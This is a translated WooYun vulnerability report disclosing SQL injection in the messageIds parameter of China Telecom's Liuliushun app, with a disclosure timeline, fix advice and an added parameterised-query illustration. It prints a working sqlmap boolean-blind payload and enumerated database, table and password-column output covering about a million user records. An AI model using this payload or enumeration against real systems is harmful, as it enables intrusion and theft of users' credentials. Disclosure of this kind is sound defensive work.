
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0212836

Title: SQL injection in the Liuliushun (流流顺) app (affects a million Sichuan Telecom users)

Vendor: China Telecom

Author: Chora

Submitted: 2016-05-25 22:09

Fixed: 2016-07-11 14:40

Published: 2016-07-11 14:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-05-25: Details sent to the vendor, awaiting vendor handling
2016-05-27: Vendor confirmed; details visible to the vendor only
2016-06-06: Details disclosed to core white hats and experts in the relevant field
2016-06-16: Details disclosed to regular white hats
2016-06-26: Details disclosed to intern white hats
2016-07-11: Details disclosed to the public

Brief description:

Beep. Senior citizen card.

Detailed description:

Almost every Sichuan Telecom user knows the Liuliushun (流流顺) app. The problem lies in the delete-message function: the messageIds POST parameter is injected into the SQL query without sanitisation.

(screenshots 1.jpg and 2.png omitted)

Proof of vulnerability:

POST parameter 'messageIds' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
---
Parameter: messageIds (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: token=10D0C20E2A11DF7700D3FFE44604EF36AE6A0F24443F42CAD57E153DD9A0BE886DFB71ABA71DEC3A397B6F476B4A0AA0475824943C38B725&messageIds=150130320) AND 1670=1670 AND (5658=5658
---
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] SCWY
[*] SCWY_WEIXIN_1W
[*] SYS
[*] SYSTEM
[*] XDB
Database: SCWY
[151 tables]
Table: TM_PUSH_USER
[10 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| ACTION       | VARCHAR2 |
| ACC_NBR      | VARCHAR2 |
| CHANNEL_ID   | VARCHAR2 |
| CREATE_TIME  | DATE     |
| CUSTOMER_ID  | NUMBER   |
| DEVICE_TOKEN | VARCHAR2 |
| ID           | NUMBER   |
| IOS_ANDROID  | VARCHAR2 |
| STATE        | VARCHAR2 |
| USER_ID      | VARCHAR2 |
+--------------+----------+
Database: SCWY
Table: TM_HW_USER
[7 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| CREATE_TIME     | DATE     |
| ID              | NUMBER   |
| INVITE_CODE     | VARCHAR2 |
| PASSWORD        | VARCHAR2 |
| PHONE           | VARCHAR2 |
| SECRET_PASSWORD | VARCHAR2 |
| SMS_PHONE       | VARCHAR2 |
+-----------------+----------+
Database: SCWY
+------------+---------+
| Table      | Entries |
+------------+---------+
| TM_HW_USER | 1034067 |
+------------+---------+

Fix recommendation:

Filter the input: validate messageIds as a list of integers and bind it as query parameters instead of concatenating it into the SQL statement.
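As an added illustration (not code from the report or from the app), the following shows the query shape implied by the sqlmap payload above next to a hardened delete handler: allow-list parsing of messageIds, one bind parameter per id, and an ownership check. The table and column names, the sqlite3 backend standing in for Oracle, and the ownership scoping are all assumptions for the example.

```python
import re
import sqlite3

# Constructed stand-in for the app's message table. The real backend is Oracle;
# sqlite3 is used only so this runs offline (assumption), and the table/column
# names are invented for the example, not taken from the report.
SCHEMA = "CREATE TABLE tm_message (id INTEGER PRIMARY KEY, user_id TEXT, body TEXT)"
ROWS = [(150130320, "u1", "a"), (150130321, "u1", "b"), (150130322, "u2", "c")]
# Boolean-based blind payload exactly as sqlmap reported it in the proof above.
PAYLOAD = "150130320) AND 1670=1670 AND (5658=5658"


def build_vulnerable_sql(message_ids: str) -> str:
    """Query shape implied by the payload: the raw POST value is pasted into an
    IN (...) list, so the closing ')' lets the rest become WHERE conditions.
    Returned as text for inspection only; it is never executed here."""
    return f"DELETE FROM tm_message WHERE id IN ({message_ids})"


def parse_message_ids(raw: str, max_ids: int = 100) -> list:
    """Allow-list validation: only a comma-separated list of decimal integers
    passes, so any quote, parenthesis or keyword is rejected before SQL is built."""
    if not re.fullmatch(r"\d+(,\d+)*", raw):
        raise ValueError("messageIds must be comma-separated integers")
    ids = [int(x) for x in raw.split(",")]
    if len(ids) > max_ids:
        raise ValueError("too many message ids")
    return ids


def delete_messages(conn: sqlite3.Connection, user_id: str, raw_ids: str) -> int:
    """Hardened form: validated ints, one bind parameter per id, and the delete
    scoped to the caller's own rows (ownership check is an assumption about the
    app; the report only covers the injection)."""
    ids = parse_message_ids(raw_ids)
    placeholders = ",".join("?" for _ in ids)  # derived from a count, not from input
    cur = conn.execute(
        f"DELETE FROM tm_message WHERE user_id = ? AND id IN ({placeholders})",
        [user_id, *ids],
    )
    return cur.rowcount


def demo() -> int:
    """Seeds the table, deletes two of u1's messages legitimately, returns rows left."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO tm_message VALUES (?, ?, ?)", ROWS)
    assert delete_messages(conn, "u1", "150130320,150130321") == 2
    return conn.execute("SELECT COUNT(*) FROM tm_message").fetchone()[0]
```

Feeding PAYLOAD to delete_messages raises ValueError before any SQL is built, whereas build_vulnerable_sql(PAYLOAD) shows the injected conditions landing inside the WHERE clause.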

Copyright notice: when reposting, please credit the source: Chora@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-05-27 14:32

Vendor reply:

CNVD has confirmed the reported issue; it has been passed via CNCERT to China Telecom Group, which will coordinate handling with the site's management department.

Latest status:

None


Comments:

  1. 2016-05-26 01:14 | answer, verified white hat ( regular white hat | Rank:453 vulnerabilities:54 | the answer)

    Front row.

  2. 2016-05-26 08:08 | 大师兄 ( intern white hat | Rank:31 vulnerabilities:8 | must check WooYun every day)

    A white hat you follow, Chora, published a vulnerability: SQL injection in the Liuliushun (流流顺) app (affects a million Sichuan Telecom users)

  3. 2016-05-26 08:47 | 小胖子, verified white hat ( core white hat | Rank:1890 vulnerabilities:157 | don't fret over gains and losses; I envy you, but I still choose to...)

    Isn't there free data to claim? Why didn't you grab some more?

  4. 2016-05-26 09:13 | Chora, verified white hat ( regular white hat | Rank:397 vulnerabilities:27 | survival, living, life.)

    @小胖子 Remember to come visit me and bring me food...